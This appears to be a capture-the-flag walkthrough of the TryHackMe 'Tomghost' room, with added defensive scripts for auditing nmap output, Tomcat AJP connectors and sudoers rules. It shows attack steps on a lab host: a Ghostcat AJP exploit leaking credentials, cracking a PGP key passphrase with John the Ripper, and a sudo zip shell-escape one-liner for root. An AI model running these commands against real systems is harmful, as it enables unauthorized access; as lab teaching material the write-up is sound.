Tomghost


Last updated 3 years ago


Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so the host is scanned even if it does not answer ping.

nmap -Pn 10.10.193.3

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,53,8009,8080

  • (-oN nmap): Saving the output in normal format to a file called nmap

nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3
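As an added example (not part of the original writeup), here is a small Python parser for the normal-format output that the -oN flag above writes. It pulls out port, state, service and version from each port line, skips the NSE script lines, and flags any open service that should only ever be reachable from a reverse proxy or loopback, which is the defender's reading of the scan. The sample output embedded below is constructed to match the shape of this scan; the version strings are made up, not the real results.

```python
import re
from typing import Dict, List

# Constructed sample of nmap -oN ("normal") output in the shape the scan above
# produces. The version strings here are made up; this is not the real scan.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3
Nmap scan report for 10.10.193.3
Host is up (0.045s latency).

PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu (Ubuntu Linux; protocol 2.0)
53/tcp   open   tcpwrapped
8009/tcp open   ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open   http    Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux

# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Services that should normally be reachable only from the reverse proxy or
# loopback; seeing one of them from an external scan is a finding in itself.
INTERNAL_ONLY_SERVICES = {"ajp13"}


def parse_nmap_normal(text: str) -> List[Dict[str, object]]:
    """Return one record per port line; NSE script lines ("| ...") are skipped."""
    records: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        records.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return records


def open_ports(records: List[Dict[str, object]]) -> List[int]:
    return [int(r["port"]) for r in records if r["state"] == "open"]


def exposed_internal_services(records: List[Dict[str, object]]) -> List[int]:
    """Open ports whose service should not be reachable from an external scanner."""
    return [int(r["port"]) for r in records
            if r["state"] == "open" and r["service"] in INTERNAL_ONLY_SERVICES]


if __name__ == "__main__":
    recs = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print(f'{r["port"]}/{r["proto"]:<3} {r["state"]:<8} {r["service"]:<10} {r["version"]}')
    print("open:", open_ports(recs))
    print("internal-only services exposed:", exposed_internal_services(recs))
```

Point it at the real file with `parse_nmap_normal(open("nmap").read())`; the same parser works for any -oN output since only the port-line layout is relied on.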

Enumeration

Let's visit the web server on port 8080.

It's the default Apache Tomcat/9.0.30 page; there is nothing interesting on it.

Let's look at the service running on port 8009, which is ajp13: a binary protocol used to reverse-proxy requests from a web server to an application server. Let's look for exploits for this service.

searchsploit ajp

The second exploit in this list is just what we are looking for, so let's read the exploit and see how to use it. To do this we need to copy it to our working directory.

searchsploit -m multiple/webapps/48143.py
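The reason the next step works at all is that the Tomcat AJP connector is reachable from the network. As an added example (not part of the original writeup, and not the configuration of this machine), the Python script below audits a Tomcat server.xml for that condition: it reports any AJP connector that is not bound to loopback and any that has no shared secret configured. The two server.xml fragments are constructed: one with the weak default, one hardened with address="127.0.0.1" and secretRequired="true" (attributes that exist in Tomcat 9.0.31 and later; the secret value is a placeholder).

```python
import xml.etree.ElementTree as ET
from typing import List

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost", "0:0:0:0:0:0:0:1"}

# Constructed server.xml skeleton; the AJP connector line is swapped in below.
SERVER_XML_TEMPLATE = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    {ajp_connector}
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

# Weak setting: AJP listens on every interface with no shared secret.
INSECURE_SERVER_XML = SERVER_XML_TEMPLATE.format(
    ajp_connector='<Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>'
)

# Hardened setting: bound to loopback and a secret required (Tomcat 9.0.31+).
# The secret value is a placeholder; generate a random one in real deployments.
HARDENED_SERVER_XML = SERVER_XML_TEMPLATE.format(
    ajp_connector='<Connector port="8009" protocol="AJP/1.3" address="127.0.0.1" '
                  'secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443"/>'
)

# Stock Tomcat 9.0.31+ ships the AJP connector commented out; the XML parser
# drops comments, so such a file produces no findings.
DISABLED_SERVER_XML = SERVER_XML_TEMPLATE.format(
    ajp_connector='<!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/> -->'
)


def audit_ajp_connectors(server_xml: str) -> List[str]:
    """Return one human-readable finding per weakness found on AJP connectors."""
    findings: List[str] = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        # A Connector without a protocol attribute is HTTP/1.1 by default.
        protocol = conn.get("protocol", "HTTP/1.1")
        if "ajp" not in protocol.lower():
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None or address not in LOOPBACK_ADDRESSES:
            findings.append(
                f"AJP connector on port {port} listens on {address or 'all interfaces'}; "
                f"bind it to 127.0.0.1 or remove the connector"
            )
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f'AJP connector on port {port} has secretRequired="false"')
        elif not conn.get("secret"):
            findings.append(f"AJP connector on port {port} has no shared secret configured")
    return findings


if __name__ == "__main__":
    for label, xml_text in [("insecure", INSECURE_SERVER_XML),
                            ("hardened", HARDENED_SERVER_XML),
                            ("disabled", DISABLED_SERVER_XML)]:
        print(label, audit_ajp_connectors(xml_text) or ["no findings"])
```

Run it against a real file with `audit_ajp_connectors(open("/path/to/conf/server.xml").read())`; the loopback binding is what stops the exploit used below, and the secret stops a proxy on another host from being impersonated.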

Exploitation

Looking at the exploit, it seems we just need to run it against the target's IP address.

python 48143.py 10.10.193.3

And we find credentials, which we can use to log in over SSH.

ssh skyfuck@10.10.193.3

We can read the user file, which can be found with this command:

find / -type f -name user.txt 2>/dev/null

Privilege Escalation

Looking in the current directory, there are two files.

One is credential.pgp, an encrypted PGP (Pretty Good Privacy) file. The other is tryhackme.asc, an ASCII-armoured key file.

First we need to import the .asc key file and then decrypt credential.pgp.

gpg --import tryhackme.asc
gpg --decrypt credential.pgp

It looks like we need a passphrase, so let's first copy the key file to our machine and then crack the passphrase using John the Ripper.

scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc .

Next we extract a crackable hash from the key with gpg2john and then crack it with john.

gpg2john tryhackme.asc > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

After cracking it you get the password alexandru.

Now you can decrypt the pgp file.

gpg --decrypt credential.pgp

We find credentials for another user, so let's switch to merlin.

su merlin

Let's run sudo -l to see what we can run as root.

sudo -l

Looks like we can run /usr/bin/zip, so let's go to GTFOBins and look up the commands to escalate privileges to root.

Once we run these commands we get root.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

We are now root and can read root.txt to answer the last question of this room.
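The fix for this escalation path is a sudoers rule that does not grant zip (or any other binary with a GTFOBins shell escape) as root. As an added example (not part of the original writeup), the Python script below parses sudoers-style rules and flags every grant that lets a user run such a binary as root, together with whether it is NOPASSWD. The sudoers text is a constructed sample, not copied from the machine, and the risky-binary list is deliberately limited to zip, the one entry this room uses; extend it from GTFOBins for a real audit.

```python
import os
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample of /etc/sudoers content; the merlin rule mirrors the kind
# of grant that sudo -l reveals in this room but is not copied from the machine.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
merlin  ALL=(root) NOPASSWD: /usr/bin/zip
alice   ALL=(ALL) /usr/bin/systemctl status nginx
"""

# Binaries that can hand the caller a shell when run under sudo. Only zip, the
# GTFOBins entry used in this writeup, is listed; extend this from GTFOBins.
SHELL_ESCAPE_BINARIES = {"zip"}

# user host=(runas) [TAG: ...] cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):\s*)*)"
    r"(?P<cmds>.+)$"
)


@dataclass
class SudoRule:
    user: str
    host: str
    runas: str
    tags: List[str]
    commands: List[str]


def parse_sudoers(text: str) -> List[SudoRule]:
    """Parse plain user-specification lines; Defaults and *_Alias lines are skipped."""
    rules: List[SudoRule] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        if line.split()[0].endswith("_Alias"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        commands = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        # When (runas) is omitted, sudo runs the command as root.
        rules.append(SudoRule(m.group("user"), m.group("host"),
                              m.group("runas") or "root", tags, commands))
    return rules


def find_shell_escape_grants(rules: List[SudoRule]) -> List[Dict[str, object]]:
    """Flag rules that let a user run a known shell-escape binary as root."""
    findings: List[Dict[str, object]] = []
    for rule in rules:
        runas_user = rule.runas.split(":")[0]
        if runas_user not in ("root", "ALL"):
            continue
        for cmd in rule.commands:
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append({"user": rule.user, "command": cmd,
                                 "nopasswd": "NOPASSWD" in rule.tags})
    return findings


if __name__ == "__main__":
    for finding in find_shell_escape_grants(parse_sudoers(SAMPLE_SUDOERS)):
        print(f'{finding["user"]} may run {finding["command"]} as root '
              f'(NOPASSWD={finding["nopasswd"]}): remove or replace this rule')
```

On a real host, feed it the output of `sudo cat /etc/sudoers /etc/sudoers.d/*` as an administrator; rules that survive the check should run a narrow wrapper script rather than a general-purpose binary.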